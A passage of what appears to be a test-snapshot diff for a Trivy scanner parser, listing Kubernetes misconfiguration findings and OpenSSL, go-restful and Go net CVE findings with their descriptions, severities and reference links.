"https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.allowPrivilegeEscalation' to false)", + "category": "Vulnerability", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "openssl: SM2 Decryption Buffer Overflow", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", - ], - }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.readOnlyRootFilesystem' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://security.gentoo.org/glsa/202209-02", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://security.gentoo.org/glsa/202210-02", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://ubuntu.com/security/notices/USN-5051-1", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://www.debian.org/security/2021/dsa-4963", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", - }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ + "value": "https://www.openssl.org/news/secadv/20210824.txt", + }, { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.tenable.com/security/tns-2021-16", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2022-02", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.16.0+incompatible", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-1996", - "installedVersion": "v2.15.0+incompatible", - "packageName": "github.com/emicklei/go-restful", + "fixedVersion": "1.1.1n-0+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1292", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1996", - "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", - "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", - "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", - "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", - "https://github.com/emicklei/go-restful/issues/489", - "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", - "https://pkg.go.dev/vuln/GO-2022-0619", - "https://security.netapp.com/advisory/ntap-20220923-0005/", - "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-1292", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "https://linux.oracle.com/cve/CVE-2022-1292.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220602-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://ubuntu.com/security/notices/USN-5402-1", + "https://ubuntu.com/security/notices/USN-5402-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "https://www.debian.org/security/2022/dsa-5139", + "https://www.openssl.org/news/secadv/20220503.txt", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", - "location": "scb://trivy/?Namespace=kubernetes-dashboard&Kind=Deployment&Name=dashboard-metrics-scraper", + "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Authorization Bypass Through User-Controlled Key", + "name": "c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1996", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1996", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", + "value": "https://avd.aquasec.com/nvd/cve-2022-1292", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "value": "https://access.redhat.com/security/cve/CVE-2022-1292", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/emicklei/go-restful/issues/489", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0619", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'metrics-sidecar' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20220524220425-1d687d428aca", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 